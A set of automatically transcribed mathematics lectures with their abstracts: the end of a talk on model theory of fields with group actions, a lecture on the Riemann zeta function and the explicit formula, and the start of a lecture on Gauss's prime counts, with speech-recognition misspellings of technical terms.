HNM extensions, which I'll may also describe later if people ask what are they. Okay, so it may be extremely complicated picture because every finite graph may be given a structure of graph of groups. So they may be very, very complicated, but this is the full description of the actual groups. And this is what we use. So actually we describe just the general procedure, how to kind of change axioms doing each one of these operations described here. Okay, so okay, we do show if G is finite generator and the tree, then this table exists by kind of gluing the axioms for the finite groups over this graph of finite, by gluing the axioms for particular finite groups, GTCF, gluing along this graph. Yes, so how complicated, it may be complicated if the graph is complicated. Let us see the simplest example to get some feeling. So we have simple as possible graph, just two vertices, C2 on each vertex. Okay, I guess I'm able to draw it instead of showing my two fingers. Unnotate, so the graph is... Hop, C2 here, C2 here. Okay, and here basically nothing, or if you like, trivial group. Okay, so that's the corresponding graph of finite groups being of course a tree. So it corresponds to three product generated by two involutive elements. Another description is infinite diagonal groups, so semi-direct product of Z and C2. And then, okay, of course G fields are the same as fields with two involutive automorphisms, the sigma and tau. Ha, so now you can perhaps see how are we gluing the axioms. So you have to say when such a w, such a sub-variety, gives a solvable system of G equations. So we just give two conditions, we project it here on V times sigma V, and we say it should give a solvable systems of C2 equations there, and we do the same projecting of V times tau V. Okay, so it's like a free amalgamation of the axioms, you can say, and then you get the same conclusion. So you can perhaps imagine what happens if there is a group here, you have to amalgamate axioms of a group, well, and with the h and an extension you do something else. So confusing part how Z fits here, so note that Z, okay, I didn't say what is h and an extension, Z, let me write it, Z, Z, Z, Z, Z is an h and an extension of the trivial group by identity on it. So it comes kind of very trivial, so the very way the ACFA axioms are actually, not the part of basic axioms here, they are part of the gluing process. Which you see on the level of h and an extensions. Okay, it is a bit complicated, but maybe you get some rough picture here. Questions to that, so now I have to undo this drawing. Okay, so this was the general theorem, this theorem exists, and it's axioms are obtained by this way of gluing the axioms. So of course it cannot, there is no clear way how to apply it in the general case, referring to the question when I just have a finite index subgroup, and I know there are axioms for finite index subgroup. This was something very, very articulate here. Okay, and now the question is whether the theories we obtain are nice, and the answer is actually no. Only the theories we already know are nice, all the new ones are not. So let me tell you why. Okay, some technology, for any group H, H hat is the profiteite completion, inverse limit of profiteite quotients. For any profiteite group KH, KH twiddle is the universal tratinic cover. Let me not get into the definition, there was the definition of tratinic cover, there is also kind of largest one, and it's unique up to isomorphism. Okay, and profiteite group is small, it has finitely many closed subgroups of a given finite index. So we showed with Oslem that if the group is victorially free, but kind of new, so not finite, finite generated victorially free, but not free, then such a profiteite group, first we take profiteite completion, then we take universal tratinic cover, and then we look at the kernel. So actually this kernel, it is claimed that it is exactly the absolute color work group of the model of G fields, or the underlying field of a substantially closed G field, but it's not small. So by results of Zohar, if a PAC field is not bounded, the absolute color work group is not small, then it cannot be simple, and apparently also not NTP2. So somehow they are not nice, so the theorem is that this theory is simple, if and only if, still theory we already knew, so the new ones are not simple. Okay, can they still be nice? So I'm rushing, but I want to finish on time. Okay, but then I guess this all new stability, as Anand was calling it, kind of stopped my education at the level of simple theories, so I'm not very familiar with that, but essentially, theories which are called NSOP1 are extensively studied, so let's just think about it, they are not simple, but still reasonably nice, and Nick Ramsey suggests an argument that this TORGTCF, for the virtual integrated, right, for the virtual refugee, should be an SOP1, and actually it is all hanging this argument on this description of color work group. So we need to show one particular fact about absolute color work group of this underlying fields, if this is shown we'll know it is NSOP1, so still quite nice, but in some new sense, not simple anymore, so that's about this theory. Okay, now the question, so what is the property of the groups, is there, can we specify the class of finally generated groups such that this theory exists, we conjecture, maybe prematurely, then the condition is exactly that they are virtually free. I must say I don't believe it anymore so much, we'll try to test some other groups like coxater groups to see, to actually disprove it. Okay, but this was, it is confirmed, this conjecture is confirmed for commutative groups, but of course the structure of finally generated commutative groups is very, very easy. So I don't believe it now, it's true. Okay, so of course if z times z and betting g, it is not virtually free, and it looks like there should be a proof which we still do not have, that if z times z and bets in g, then GTCF does not exist, so that would be on the direction of showing negative results, yes, but this is much smaller class of groups. So as I said, if it embeds in g, then g is not virtually free, but there are many, many groups which are actually pretty nasty ones, like all these groups here, infinite, very signed groups of the Taraski monster, they are finally generated, but they are periodic, so even z doesn't embed there, okay, and there are usually sources of counter examples, I guess this will be the tackling such groups, like all these crazy groups will be the most difficult part of understanding when for a fine-generated group GTCF exists. So let me finally get to the last part, which is our newest work with Oslem. So what happens when a group is not fine-generated, and we kind of cannot easily access geometric axiomatization, because we cannot just take a product of varieties hit by all generators, it becomes not first order, it is infinite product, so it's hard to control the full action in the first order way. Okay, so one way to deal with it is to hope that actually the theory is logically nicely approximated, which doesn't need to happen, so a very general thing, okay, which I stated in general terms, but then I will explain what does it mean in case of groups. If you have a chain of theories, like think about chain of G fields when G's are growing, okay, if they all have model companions, like this theory is GTCF, and if they form a chain as well, then union of this chain of model companions is a model companion of original chain. This is actually, I mean the big, because in paper of David Biggs and others, rather easy observation, okay, what does it mean in our situation? So in our situation, I assume that G is union of some groups Gm, which are understood such that GTM, Gn Tcf exists, so by the Pliberst diagram, if this Gn Tcf form an increasing chain, then we are done, but then things get subtle. So first Alice, Alice Medvedev did it for Q, okay, so of course Q is union of infinite cyclic groups, where we have, where we allow greater and greater denominators, so we get generated by one over factorial. Assumptions are satisfied, so we get this theory, we get the union, she called, which was called by Alice Quackfiger's, in our terms it will be GTCF, that's the positive situation. We noticed we've also learned it is also satisfied for the proofing group, okay, so Cp infinity union of all cyclic P groups, but then if instead of cyclic groups, P groups, you take the products, then you don't get a chain. If I have time, which I don't, I may explain it in the last slide, why not, and similarly let's look at this funny group Cp like primes, which is a direct product of all of all cyclic Cps, so here C2, sorry, type what, it should be Tcf here, sorry, should be Tcf here, Cp square Tcf, it's not a subtheore of Cp square, square Tcf, and C2 Tcf is not a subtheory of C2 plus C3, which is C6 Tcf, but still, the full thing exists, this theorem here, it was only one implication, it is not even on leave. So the last slide, so if I ask, let me look at torsion groups, in commutative torsion groups, so they are union of finite commutative groups, and then actually it was nice, we get the full answer, which is again perhaps a bit surprising, this theory exists, Tcf exists, so okay, so A decomposes a direct sum of P prime artifacts, yes, of P groups, so the condition is that each of them should be finite or be the proof. So group like proof, a group plus Cp, this is forbidden group, this we shouldn't have, and then if this theory exists, it is strictly simple, not stable, not super simple, which is easy, simplicity is kind of logically local property, so sorry, oh, and one minute over time, so this theory is axiomatized by Galov axioms, which I am specifying, and actually not by geometric axioms, because it's not the union, so action should be faithful, case should be perfect, there should be choice of these AIs, such that each of them is PAC, and then it should have prescribed small profanity groups, all the absolute Galovar groups, okay, so this axiomatization, so okay, sorry, I mean that's all the time, I stop here, thank you. Thank you very much. Are there any questions? I have a question. Yes, yeah. You know this, I wonder, there's this famous theorem, I can't remember who did it, maybe Molar and Schupter or Dunwoody or someone, they prove that the finally generated groups with context-free word problem are precisely the virtual... Yes, yes. Do you expect there to be some connection with the TCF, QTCF and the word problem for a group? Yeah, so it was intuitive, morally there is lots of connection, because there are exactly virtually three, yes, so yes, there are lots of equivalent conditions, like also the K-leagraph is of finite tree width or something, if you look at these conditions, they kind of morally tell you that yes, but our technically, we were able to use this geometric condition, maybe there could be another approach using that, yeah, but there are many equivalent conditions, yes, like the one you said, which are logical in nature, but we couldn't employ them, but I'm sure there is there are some maybe some deeper philosophical other connections, we are looking, we are definitely looking at this, we are trying to use them, but at the end this bus theory, they're about to be useful, but there should be something there, but I don't know what is what is really there. Well, I may show this slide and say nothing. I have a question, have you seen about a theory where the field is endowed with evaluation? So when you endowed your field with evaluation, so you have a group, yeah, so the group respects, the group respects evaluation or something, yes, yes, okay, no, but actually Daniel, Daniel Hoffman, then he started a project, so he applies group action to any theory, so one particular instance, and I think it's a good idea to look at that, but I guess so people were doing like version of action of z, so evaluation and automorphism, so many people were looking at the theory of this, but I don't know about any other work with other groups, but it's definitely a good idea to look at it, so that's my answer. And I was wondering if it's with z2, your theory doesn't exist, but if you add evaluation, is it is it known? I mean that's quite, so this is a better question, no, no, it's not known to my knowledge, ah, whether okay, so whether the theory of valued fields with two commuting automorphism, whether it has model companion in more poetic terms, ah, maybe somebody knows, I don't know, Zohar here, I don't know, I don't know, good question, I don't know, but yes, actually it feels like, okay, it feels like with some extra constraints, maybe it would be possible, but this particular case, I have no idea, I don't know, good question, I don't know. More questions? Okay, let's thank Piotr again. And we have
For a fixed group G, we study the model theory of actions of G by field automorphisms. The main question here is to characterize the class of groups G for which the theory of such actions has a model companion (a first-order theory of "large" actions). In my talk, I will discuss several classes of groups G in this context. The case of finite groups is joint work with Daniel Hoffmann ("Existentially closed fields with finite group actions", Journal of Mathematical Logic, (1) 18 (2018), 1850003). The case of finitely generated virtually free groups is joint work with à zlem Beyarslan ("Model theory of fields with virtually free group actions", Proc. London Math. Soc., (2) 118 (2019), 221-256). The case of commutative torsion groups is joint work with à zlem Beyarslan
10.5446/54157 (DOI)
Well, I'm also truly thrilled to be back here. It's always a pleasure. So a lot of the talks in this school will be relating formulae that appear in random matrix theory to integrable structures in that theory. They are one of the reasons why one can compute things. Why the formulae that emerge in random matrix theory take particularly simple and attractive forms. So for example, in random matrix theory for the classical ensembles one can compute correlations of the eigenvalues and those correlations can be expressed in determinant form. And the determinants involve classical orthogonal polynomials and so in that sense things are exactly solvable. And you can compute the large matrix asymptotics of those determinants and get other even simpler determinant forms. So one has this notion that random matrix theory is some exactly solvable, exactly integrable problem. Well, I'm going to take a somewhat orthogonal perspective here. I suppose I'm representing a point of view which is that somewhat surprisingly the same simple formulae, these determinant forms that one gets for correlation functions and their generalizations to other statistics also emerge in settings where we don't see any integrability. And in that case their explanation is somewhat more mysterious and I'll be talking about one example of that and this is where these formulae appear in number theory. And so this really will be orthogonal to most of the other talks in the school in that what I want to do, my main purpose is to show you how these determinant expressions for correlation functions and their generalizations to other statistics appear for completely different reasons and with a completely different framework that gives rise to them. And this is quite a surprise and it's not properly understood I would say. So I'm going to start with a case in number theory which is a famous example which is the Riemann's Eta function. And I should emphasize that most of the talks will be about the number theoretic framework that allows one to do calculations. But I won't assume that you have any background in number theory or try not to assume that. So the Riemann's Eta function is a function of a complex variable s defined by a sum. And this is called Dirichlet series. And this series converges if the real part of s is greater than 1. And equivalently, you can represent the zeta function and this is why it's important in number theory as a product over primes. And this is called an Euler product. And this also converges if the real part of s is greater than 1. So it's the second representation, as I say, which is why the zeta function is an object of such importance. It encodes information about the distribution of the primes. And this was realized first of all by Euler but really exploited, most famously by Riemann. So the zeta function has certain properties. You can continue it from this half plane to the rest of the complex plane. It has a symmetry, which is the functional equation. And this is sufficiently important that I think I'll sketch the ideas behind the proof of it. So you've not seen this can see it for at least once in their lifetime. The idea is that if you get the zeta function and define an auxiliary function, which I'll call zeta tilde, which is pi to the minus s over 2 gamma of s over 2 zeta of s, then this auxiliary function is symmetric and s goes to 1 minus s. So this is the functional equation. It's a symmetry around the line real part of s is 1 half. And the proof of this, I'll just give you for completeness. Proof uses the following observation that if we get pi to the minus s over 2 gamma of s over 2 times 1 over n to the s, which you'll see is one part of the Dirichlet series defining the zeta function, you can write this as an integral. This is the integral from 0 to infinity of x to the s over 2 minus 1 e to the minus n squared pi x dx. You see that just by changing variables. And then recognizing this is the gamma function. And so therefore, zeta tilde of s, you can write as the integral 0 to infinity x to the s over 2 minus 1 times the function w of x dx, where w of x is the integral of s. w of x is the sum n is 1 to infinity e to the minus n squared pi x. And if you choose, you can split this integral from 0 to infinity up into the integral from 1 to infinity, and then the integral from 0 to 1. And if you're so minded, you can, in this second integral, replace x by 1 over x, therefore making the integration range, this integral to range from 1 to infinity, like the first integral. And you end up with zeta tilde of s is the integral from 1 to infinity x to the s over 2 minus 1 w of x dx plus the integral from 1 to infinity of x to the minus s over 2 minus 1 w of 1 over x dx. So it seems like we've not brought ourselves very much, but this w function has a symmetry, a very important symmetry itself. So if we write theta of x, the sum from n minus infinity to infinity leads to minus n squared pi x, which is therefore secretly 1 plus twice w of x. Then this theta function satisfies a very important equation, which is that theta of 1 over x is the square root of x, theta of x, which is the sort of modular symmetry, if you like, of this elementary modular form. And you can prove this in an elementary way for yourselves. This itself follows just from Poisson summation formula. So the Poisson summation form is a general formula which says that if I have some function, then this sum provided it converges. So subject to some conditions on f so that some converges, this is equal to the corresponding sum of the Fourier transform of f, where f hat of y I'm defining to be the integral from minus infinity to infinity f of x e to the 2 pi i xy dx. So this is a general formula that comes from Fourier analysis, and if you substitute in for f this function here, this is just the fact that the Fourier transform of a Gaussian is a Gaussian. So it's nothing more than the fact that the Gaussian is an eigenfunction of the Fourier transform. So with this equation, we can therefore write w of 1 over x back in terms of w of x. x transforms 1 over x into x. And so this equation here becomes the integral 1 to infinity x to the s over 2 minus 1 plus x to the 1 minus s over 2 minus 1 w of x dx. And then we're done. Because this w of x clearly decays exponentially, and so this integral makes sense for any s. So this gives an analytic continuation to the whole complex s plane. Modulo two facts. One is a term I've missed out here, which is coming from the term 1 here. So it's plus 1 over s times s minus 1. That's now a correct formula. So first of all, this has an analytic continuation to the whole complex s plane. And second, you see it's symmetric under s goes to 1 minus s. And it continues to the whole complex plane minus the points 0 and 1. It comes from the fact that from the 1 here. So the theta function is symmetric under x goes to 1 over x goes to x. But there's a 1 here that you have to incorporate. So this proves the function equation. And this is a very important observation, which was due to Riemann. And it allows us to continue the theta function where it looks as follows. So the theta function has a pole at s equals 1. The formula I wrote up there converged to the right of that pole. So out here to the right of this pole, we have the Dirichlet series and the Euler product. And you see straightforwardly from the Euler product that the Euler product is a product of terms which have no zeros to the right of this point. And so therefore, it's a convergent product of terms which have no zeros. The zeta function itself has no zeros to the right of this point. The function equation gives us a reflection symmetry with respect to the line. So the real part of s is 1 half. So therefore, since the zeta function is very simple to the right of s equals 1, it's also very simple to the left of s equals 0 by reflection. And the zeta function is essentially extremely simple over there. It does have zeros. Those come from the poles of the gamma function. So the zero is minus 2 and minus 4, minus 6, et cetera. So zeta of minus 2n is 0. But n is 1, 2, 3. Those are just the poles of the gamma function, as I say. So there are no singularities. This is the only pole of the zeta function. There are no other singularities. It's a meromorphic function. It has the simple zeros at the negative even integers. It has no zeros to the right of s equals 1. And that just leaves us with the strip bordered by the lines real part of s is 1 and real part of s is 0. So this is what's called the critical strip. And in this strip, the zeta function can have zeros. And indeed, it does. I'll show you that it has infinitely many zeros inside that strip. And of course, the Riemann hypothesis is that all of the zeros lie exactly on the symmetry line. Real part of s is 1 half. So if I denote these zeros, the zeros inside the strip by 1 half plus itn, then the Riemann hypothesis, formulated by Riemann in 1859, is that all of these zeros lie on the line with real part of s is 1 half. So if I write them in this way, this means that all these numbers tn are real. If there are zeros off the critical line, so let's say we find a zero here, then by the functional equation, s goes to 1 minus s, there must be a zero reflecting this one down here. And since the zeta function is real, when s is real, and it's an analytic function, if this is a zero, then this is a zero. And if this is a zero, then this is a zero. So zero is off the line cam. In fours, they're symmetric about the line, about the real s axis. All the zeros are. And any zeros off the line must be symmetric with respect to reflection through the critical line. The line real part of s is 1 half. And of course, as far as we know, there are no zeros off the line. This Riemann hypothesis is known to be true for the first 10 trillion zeros. That's the first 10 to the power 13. It's known that there are infinitely many zeros on this line. That's due to Hardy. It's known that if you consider a box and count the zeros inside that box on or off the line and let the length of the box go to infinity, then a positive proportion of the zeros lie on that line. That was first proved by Selberg. We now have good estimates for that proportion, at least lower bands. We know at the moment is that at least 42% of the zeros do lie exactly on that line. So this was an idea going back to Levinson, very much improved and refined by Brian Connery and Connery's proof has since been further refined. And that's got from his lower band, which is 40%. It's now got up to 42%. So we know that the Riemann hypothesis is that there's a great deal of evidence that it's true. And there's a great deal of numerical evidence it's true not just for the first 10 to the 13. That's an exact statement. But for batches of zeros, much higher. And the world record at the moment is that zeros have been computed up near the 10 to the 36th zero and all the zeros up there, long range of zeros up there all lie exactly on the line. So that's the sort of state to play for the Riemann hypothesis. Now, this isn't something that's special just to the zeta function. There's a whole class of functions called L functions, of which the zeta function is just one representative example. And I won't go into this too much. I don't think it's the point of this school. But there are lots of functions which have a Dirichlet series. That is, they can be written as sum of a n over n to the s. That's very easy to arrange. They also have an Euler product. That's the statement that these numbers a n are multiplicative. So you can write them as a product of exponentials over sum. A j is 0 to infinity of say b of p to the j over p to the j. So they have an Euler product. And again, that's not too difficult to arrange. You just have to force this function a to be multiplicative. So there are lots of examples of functions which you can write in this form. But the difficulty is that almost any examples you write down don't have a function equation. And the L functions are functions which do have a function equation. So this is a very special property. It's a reflection. s goes to under s goes to 1 minus s. So it's exceptionally difficult to arrange for functions to have these three properties. But there are examples. The Riemann's Eater functions 1. I've proved all of that for you. But there are many other examples. So I'll just give you one example of a class of functions which satisfies these axioms. This will be the function L of s chi d, which is the product of p1 minus chi dp over p to the s to the minus 1. Where this function chi d of p is plus 1. If the prime p divides the integer d, sorry, if it doesn't divide it, and if d is congruent to a square mod p, which means that you can find an integer whose square is congruent to d mod p. It's minus 1 if d is not congruent to a square mod p, and it's 0 if p divides d. A square. So it means that you can find a solution. So i.e. there is a solution to the following equation, n squared congruent to d mod p. You can find an integer whose square is congruent to d if you do arithmetic modulo p. So that means you can find a solution, and in this case, you can't find such a solution. And I won't prove it for you, but this was known in the 19th century that these functions satisfy these conditions. You could. There's an Euler product. I've written it out for you. Just by multiplying out the Euler product, you get a Dirichlet series. And then the difficult part, not too difficult, is that these satisfy function equation. Yes? That this function, how does the equation look exactly the same? It looks very, very, very similar. Yeah. There's a gamma function. There's a power of pi. And there's another extra factor, the phase factor, which doesn't work concern us. So it's essentially the same. And crucially, there is one. So there is a pi is the same. There's one gamma factor appearing. So it has very similar structure. So that was the, these were all worked out in the 19th century. And then in the 20th century, people found other classes of L functions. And this was quite a surprise. So there are other functions which satisfy those actions where you have two gamma factors appearing in the order of product. Examples of those would be L functions associated with elliptic curves. And in that case, the function equation was only proved in Andrew Wiles' work on Fermat's last theorem, so in the 1990s. So that's really very, it's much harder to prove the function equation in that case. And we now understand there's a wide class of functions which have two gamma factors. And these were all, many of these examples were worked out in the 20th century. It's really very recent that people have found examples of L functions with three or more gamma factors in their function equation. And those are really quite exotic and not properly understood. There is a general theory for where these L functions come from. They're associated with representation theory. And this is the Langlands program. But that's very far from being properly worked out. And so there are examples. That's all we need to know here. So the picture you might want to have in mind is that think of this as a class of n, infinite class of functions, indexed by an integer labeled d. And for each d, you have a different function. And each of those functions satisfy these properties. And the general expectation is that all L functions, I'll put a get out of jail free card. I'm not going to explain this, but just for experts in the audience, which are principle. It means that for trivial reasons, the L function doesn't factorize. All L functions satisfy a Riemann hypothesis. That's the expectation. This is called the generalized Riemann hypothesis or the grand Riemann hypothesis, GRH. So the Riemann hypothesis isn't something that's special to the Riemann zeta function. There's an infinite class of functions. Here's an example, each of which satisfies a Riemann hypothesis, we believe, and numerical evidence supports that statement. And then there are these higher dimensional versions from the 20th century, so to speak, with modular forms. They all satisfy Riemann hypothesis. And so there's a general picture that the Riemann hypothesis isn't special to the zeta function. It's true of a very general class of special functions called the L functions. So this is going to be important later. So you might want to think of it in the following way, that these L functions, if I think of my integer labeled D, here's one L function. Here's another L function for a different value of D. Here's a different L function. All these different functions, they all have a symmetry line. And they all have a Riemann hypothesis that places the zeros on this line. In these modular examples, what is the analog of the Poisson summation formula? So it's symmetry of the Fourier transform of the character chi. Right, so that's some background on L functions. Now I'm going to introduce the one tool that we have to understand these zeros. So analytic number theory is somewhat impoverished compared to random matrix theory, where we've heard there are many approaches, Riemann-Hilbert, classical operator theory, et cetera. Really in analytic number theory, there is one tool that one can use. And this is called the explicit formula. So I'll set this up for the Riemann-Zeta function, but I'll tell you how there is such a formula for any L function, and I'll tell you how to generalize the formula and write down for all L functions. So I'm going to give you one version of the explicit formula. There are many of them, depending on which application you have in mind, but they all have more or less the same form. So I'll write a form down, which is consistent with, which is the easiest one. So let's say let G be a C infinity function, which is compactly supported on the real line. So it's a smooth, compactly supported function. And we'll assume that it's symmetric. So G of minus x equals G of x. Not necessary. You can write down formulae when that's not the case, but they're just a little uglier, and that generality doesn't bias very much. So I won't invoke it. And let's set H of z to be the Fourier transform of G. And now, against all my instincts, I'm going to define the Fourier transform without 2 pi in the exponent, which is a horrible thing to do, but it will make life a little easier for this calculation. So since G is smooth and compactly supported, H is an entire function, and it decays exponentially on the real axis. And H of z is order e to the minus c mod z. As mod z tends to infinity, mod z is real. Now, I'm going to define the following function called the von Mangert function. Lambda of n is log p. If the integer n is a power of a prime p, and it's 0 otherwise. So this function seems a little unnatural, but in number theory, it's a very natural object. For the following reason, that if I get the Riemann's theta function and take its logarithmic derivative, this is minus the sum n is 1 to infinity of lambda of n over n to the s. And you see that simply by taking the logarithm of the Euler product. The logarithm of the product is a sum, and then differentiating that. And you'll get immediately to this formula. So now here's then the explicit formula, and the details won't matter to us, but this is the one formula you should pay great attention to. Here's the theorem, which is due in this generality to Andrei V. And he says the following. Let's get a sum, sum of all the non-trivial zeros, that is the complex zeros of the zeta function, and evaluate h at the tn. So remember, I'm writing the zeros as a half plus i tn, and then I'm getting these numbers tn. There are infinitely many of them, and I'm evaluating h at those and summing. And then if I subtract off twice h of i over 2. So the j's are the zeros of this strip. Yes. On the line or off the line? On the line or off the line. We're not assuming the Riemann hypothesis here. But yes, there are zeros inside the strip. Sorry? Yeah, it's the imaginary. The zeros are a half plus i tn. I'm getting the numbers tn, which may or may not be real. Wow, OK. And I'm summing h over those numbers. Now, the Riemann hypothesis would say these numbers are all real. But I'm not assuming that. h is an entire function. I can sum it at these infinitely many values. And then the zeta function is the sum of all the values. The infinitely many values. And then the theorem is that you can evaluate this to be the following. It's 1 over 2 pi times the integral h of r times gamma prime over gamma of a quarter plus i r over 2 minus log pi dr minus twice the sum over m lambda of m over root m g of log m. So we'll spend some time talking about this formula and unpacking what it's telling us. Yes? This question of h is, where does it have this decay? Where does it? Why does it have this decay? Where? When z is real. When z is real, if z is real, it's on the real axis, it decays exponentially at either positive or negative z. And that follows because g is compactly supported. It's the Fourier transform for compactly supported smooth function. Yeah, you can work. Yes? Yeah. So you know that. Yes. Exactly. Yeah. Yeah. Yeah. So this converges under the assumptions that I've stated. So what's this telling us? It's saying that we pick our function h and g of Fourier transforms of each other. But we have freedom to choose what g is. Once we've chosen that, we can't choose what g is. Once we've chosen g, we then give an h and vice versa. So it says that we choose a function. Let's say we choose the g function. And we want to evaluate a sum over primes and their powers. The lambda function picks out is non-zero only when it's argument is a power of a prime. We're coming over powers of primes here. And we're evaluating the g function at the log of those prime powers for any function g that satisfies the conditions of theorem. And the statement is that you can evaluate this sum over primes and their powers in terms of a sum over the zeros, where what appears is the Fourier transform of g. And you have this additional integral that appears. Vice versa, if you want to understand the zeros, you want to choose your function h so that you evaluate this is some nice function which you want to analyze summed over the zeros. And the statement is that then a sum over the zeros is equivalent to a sum over primes in their powers, where what appears here is then the Fourier transform of h. Again, there is this factor here, this integral. The right hand side is a finite sum, yeah, if g is compactly supported. And so I've written in that form because I'm going to want to use this to analyze the primes for a moment. But vice versa, I could have chosen h to be compactly supported, then g wouldn't be. But there is a sort of duality going on here in that if I want to analyze primes zeros in some small range of the critical strip. So h is a localized function, then g will be very delocalized, and I'll have a very long sum over the primes. Vice versa, if I want to analyze primes in a short range, g will be very localized, and h will be very delocalized. I'll have a long sum over the zeros. And a lot of analytic number theory is playing off those two things against each other. It's optimizing the functions g and h so that you analyze some property that you wish to understand. So let me give you the proof of this or sketch you. I'll give you the ideas behind the proof, and I'll leave the proof as an exercise for those who want to do it. It's pretty straightforward. So the proof, let's set. This is follows. Let's set h of s to be the integral of g of x. e to the s minus 1 half x dx. So this is g is compactly supported. This makes sense. And we're going to compute the following integral, 1 over 2 pi i integral c going from c, the integral goes from c minus i infinity to c plus i infinity, where c is greater than 1. So this is a contour integral on some line parallel to the imaginary axis, but shifted away from that so that it lies at least further than 1 away of h of s zeta tilde prime over zeta tilde of s dx. And the proof just basically relies on computing that integral in two ways. So the first way you can compute this integral is explicitly. It's to note that zeta tilde, so method one, is to use the fact that zeta tilde of s is pi to the minus s over 2. Gamma of s over 2 zeta of s. So the derivative of the log of zeta tilde means I have to differentiate the log of pi to the minus s over 2. That's going to give me a log pi. I'm going to get the derivative of the log of the gamma function. Oh, here we are. It's precisely these two terms here. So those two terms, this integral, simply comes from the first two factors here. The logarithmic derivative of zeta I've already defined for you is at the top board there. It's the sum of von Mangold functions over n to the s. And if you substitute that in and use the fact that if c is greater than 1, that sum converges and integrates term by term, this gives you precisely the right-hand side of the explicit formula. So this integral is equal to the right-hand side very straightforwardly, simply by direct evaluation of the logarithmic derivative of this function using the Dirichlet series for the logarithmic derivative of zeta in terms of the von Mangold function. The alternative is to use Cauchy's theorem because h of s is an entire function. And so the only singularities of the integrand here come from singularities of the logarithmic derivative of zeta tilde, well, zeta tilde has logarithmic singularities. The logarithmic derivative of zeta tilde has singularities at points where this function is 0. That's at the 0s of the zeta function or at the poles of zeta tilde, which are at 0 and 1. And so those contributions, together with the function equation, use Cauchy's theorem plus the function equation. And this gives you precisely the left-hand side. So I won't do that for you on the board. It's a straightforward calculation. But that proves the function equation. So this function is the explicit formula. So this kind of formula was first written down by Riemann in 1859 for very special choices of G and H. And in this generality, it was due, as I said, to André Vey in the late 1940s and early 1950s, who recognized the sort of general structure. So this is how you prove this for the Riemann zeta function. Now, if you want to prove this for any L function, basically the calculation's the same. The only difference is that you have to consider the logarithmic derivative of that L function. And so you then have different coefficients here. You don't get the von Mangel function. Function lambda, you get von Mangel function changed slightly. And it's that function that then appears in the explicit formula. So basically, for the example I've given you here of the quadratic Dirichlet L functions, you'd have the von Mangel function multiplied by a character chi. So for any L function, you have a similar formula. Because I want to use the functional equation very straightforwardly, I want to reflect the function G. Yes, yes. It just makes the formula look slightly less pretty. But no, you can do that. Now, I'll give you two examples now of how this can be used, although I won't go through the proofs. You have two minutes per example. Two minutes per example. Very good. Right. Pity I didn't ask for 10 examples, isn't it? By scaling theory, I think that would have brought me some more time. So two examples of use of this would be, first of all, I don't want to rub anything off of that media under here. So EG1 would be the prime number theorem. And this is an example where you might want to choose G to be compactly supported in some range where you only pick up contributions from the primes and their powers in some interval, say from m is 0 to x. So we can choose G to be 1 if log m is less than log x and 0 otherwise, smoothly interpolating, perhaps multiplied by root m to get rid of this factor. And if you work that through, this is a non-trivial step, but it can be done. The prime number theorem says that if you sum the von Mangel function for n less than or equal to x, this is asymptotic to x as x tends to infinity. And this is one of the high points of 19th century number theory. And this comes about because you can see how to arrange this sum to just sum the von Mangel function up to x. So you choose G to be root m if m is less than x and 0 otherwise. Essentially, under those conditions, you only pick up the contribution from this pole and the contributions from the 0s are subdominant because we know that there are no 0s on the edges of the critical strip. So no 0s actually on the line real part of s is 1 or real part of s is 0. So the prime number theorem follows from that fact. And the Riemann hypothesis would buy you the optimal error term here, which is the order of the square root of the main term. And a second example of use would be if we want to sum 0s such that the real part of tn lies between 0 and capital t, then we want to choose our function h to be a step function. And that means that the price we pay is that this function is quite localized. It's a long sum. We think of t tends to infinity. And then the statement is that as t tends to infinity, that's in product of t over 2 pi log t over 2 pi minus t over 2 pi plus order log t. So this tells you that the number of 0s in the critical strip grows as you look higher up in the critical strip, like t on 2 pi log t on 2 pi, which means that the mean separation between the 0s, that the 0s get logarithmically more dense as you go up in the critical strip. And so the mean separation between the 0s decreases logarithmically with height at the critical strip. Thank you. By two minutes. You
I will give an overview of connections between Random Matrix Theory and Number Theory, in particular connections with the theory of the Riemann zeta-function and zeta functions defined in function fields. I will then discuss recent developments in which integrability plays an important role. These include the statistics of extreme values and connections with the theory of log-correlated Gaussian fields.
10.5446/54162 (DOI)
So let me remind you where we've got to so far. In lecture one, I basically told you that there is a duality, Fourier duality between the primes and the zeros of the zeta function. So if you know, have information about the primes, that tells you something about the zeros and vice versa. And that's embodied in the explicit formula. In the second lecture, I told you that there is a conjectured relationship between the statistics of the zeros of the zeta function and the eigenvalues of random matrices. And I framed this in the setting of random unitary matrices. But I should emphasize that everything I said yesterday would apply equally well to the GUE, to complex emission matrices. And there's no real distinction at the level of the discussion I gave yesterday. The limiting results as n tends to infinity, matrix i tends to infinity, the same in both cases. And the idea is that one can prove a result consistent with this connection. This is Montgomery's theorem, which says that for some limited class of test functions, you can really prove this relationship. But if you want to prove this for a wider class of test functions, the functions that we believe it's true for, then you need information about pair correlations of prime numbers that we don't know how to prove at the moment. If you take the standard conjectures in the field, then you can establish this connection with random matrix theory, but we don't know how to prove those conjectures. And the question I left with was, is that conjecture about the pair correlation of the primes that implies Montgomery's conjecture is true. But are they equivalent where I left off was with saying that, in fact, you can get away with less. And let me tell you what you can get away with, and let me tell you precisely what Montgomery's conjecture for the pair correlation of the zeros of the zeta function is equivalent to in terms of counting prime numbers. So this goes back to a classical problem in the theory of primes. In fact, one of the earliest problems that was identified by Gauss. So when the end of the 18th century, Gauss as a prodigious young mathematician did calculations of primes, counted primes in various intervals, and this led him to the experimental conjecture, which is now called the prime number theorem. So the prime number theorem came from, was originally proposed by Gauss in 1796 based on our numerical computations, our numerical data generated by hand. And what Gauss did was the following. He took consecutive integers, a range of consecutive integers, and he took in his calculations, which still exists. We have the notes in which he did the calculations. He would consider ranges of integers of length 1000. So he considered the first thousand integers, the second thousand integers, the third thousand integers, etc. And all in all, in his, in his calculations, he considered 3000 ranges of integers, which means he computed the primes amongst the first three million integers. Pardon? Gauss was the computer. And he said that by the time he'd go up to full speed, it took him 15 minutes to check a thousand integers. And I should say that in 1796 Gauss was about 15 years old. So this, in that sense, we're all past it. So, so he, and he records very carefully how many primes there were in each range of 1000 consecutive integers. There is a name for 1000 consecutive integers in certainly in, well, certainly in English, probably in other other other languages too. It's called Achiliad in English. Although I suspect that that the origins of that term are not Anglo-Saxon. So in Achiliad, range of consecutive 1000 consecutive integers, Gauss counted how many primes there were. He recorded that number. Then in the next thousand integers, then in the next thousand integers. And he analyzed the data statistically. And he observed something like a normal distribution in the fluctuations. So you count the number of primes in a given Achiliad. A number you record, then the number in the next Achiliad, then the number in this, those numbers fluctuate. If he averaged over his 3000 